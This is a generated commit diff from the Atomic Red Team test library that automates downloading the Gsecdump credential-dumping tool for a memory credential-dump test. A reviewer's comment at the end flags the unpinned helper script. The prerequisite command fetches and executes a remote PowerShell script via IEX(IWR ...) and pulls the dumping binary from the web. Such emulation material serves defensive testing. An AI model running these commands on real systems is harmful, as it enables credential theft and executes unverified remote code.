Generate docs from job=validate_atomics_generate_docs branch=master

CircleCI Atomic Red Team doc generator
2020-03-07 22:20:30 +00:00
parent 291346e52b
commit 31f946622d
2 changed files with 23 additions and 5 deletions
+8 -2
@@ -201,6 +201,8 @@ Dump credentials from memory using Gsecdump
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| gsecdump_exe | Path to the Gsecdump executable | Path | PathToAtomicsFolder\T1003\bin\gsecdump.exe|
| gsecdump_url | Path to download Gsecdump binary file | url | https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe|
| gsecdump_bin_hash | File hash of the Gsecdump binary file | String | 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
@@ -211,14 +213,18 @@ Dump credentials from memory using Gsecdump
#### Dependencies: Run with `powershell`!
##### Description: Windows Credential Editor must exist on disk at specified location (#{gsecdump_exe})
##### Description: Gsecdump must exist on disk at specified location (#{gsecdump_exe})
##### Check Prereq Commands:
```
if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
Write-Host Automated installer not implemented yet
$parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe"
IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1")
if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}){
Move-Item $binpath "#{gsecdump_exe}"
}
```
+15 -3
@@ -19486,12 +19486,24 @@ credential-access:
description: Path to the Gsecdump executable
type: Path
default: PathToAtomicsFolder\T1003\bin\gsecdump.exe
gsecdump_url:
description: Path to download Gsecdump binary file
type: url
default: https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe
gsecdump_bin_hash:
description: File hash of the Gsecdump binary file
type: String
default: 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC
dependency_executor_name: powershell
dependencies:
- description: Windows Credential Editor must exist on disk at specified location
(#{gsecdump_exe})
- description: Gsecdump must exist on disk at specified location (#{gsecdump_exe})
prereq_command: 'if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1}'
get_prereq_command: Write-Host Automated installer not implemented yet
get_prereq_command: |-
$parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe"
IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1")
if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}){
Move-Item $binpath "#{gsecdump_exe}"
}
executor:
name: command_prompt
elevation_required: true
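Review bot: The new `get_prereq_command` loads its verifier with `IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1")`, which runs whatever is on the mutable `master` branch at execution time. The `gsecdump_bin_hash` check is therefore only as trustworthy as an unpinned, unverified helper script. Pin the helper to a reviewed commit, e.g. `IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/<PINNED_COMMIT_SHA>/Public/Invoke-WebRequestVerifyHash.ps1")` (placeholder SHA), or call the function from the locally installed module if it is exported there. The same command text appears in the "Get Prereq Commands" block of the Markdown section above. Both files appear to be generated by the doc job, so the change presumably belongs in the atomic's source definition; the enclosing test definition starts above this hunk.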